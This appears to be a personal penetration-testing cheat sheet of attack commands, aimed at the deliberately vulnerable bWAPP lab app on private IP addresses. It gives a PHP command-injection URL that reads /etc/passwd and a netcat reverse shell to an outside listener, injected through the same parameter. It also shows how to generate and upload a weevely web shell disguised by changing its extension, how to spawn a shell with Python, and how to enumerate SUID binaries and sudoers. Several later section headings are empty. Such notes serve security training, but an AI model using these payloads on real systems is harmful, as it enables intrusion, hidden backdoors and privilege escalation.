
==========================================================================================
PHP injection connection

http://192.168.133.145/bWAPP/phpi.php?message=hello;system("cat /etc/passwd")

nc -nvlp 1234   // listen for connection from port 1234

// connect to ip at port. can chanage bin/bash to bin/sh
http://192.168.133.145/bWAPP/phpi.php?message=hello;system("nc 192.168.133.144 1234 -e /bin/bash") 

// weevely : create php files and payloads. can change php endings to other extension to hide
weevely generate 123456 myweevely.php
weevely http://192.168.133.145/bWAPP/images/myweevely.php 123456

==========================================================================================

Spawning shell thru Python

python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import pty; pty.spawn("/bin/bash")'

==========================================================================================
Find binaries that have suid bit set (root)

find / -perm -u=s -type f 2>/dev/null

==========================================================================================
Find super users 

cat /etc/sudoers
==========================================================================================
Command Executions and SSI
==========================================================================================
==========================================================================================

==========================================================================================
==========================================================================================

==========================================================================================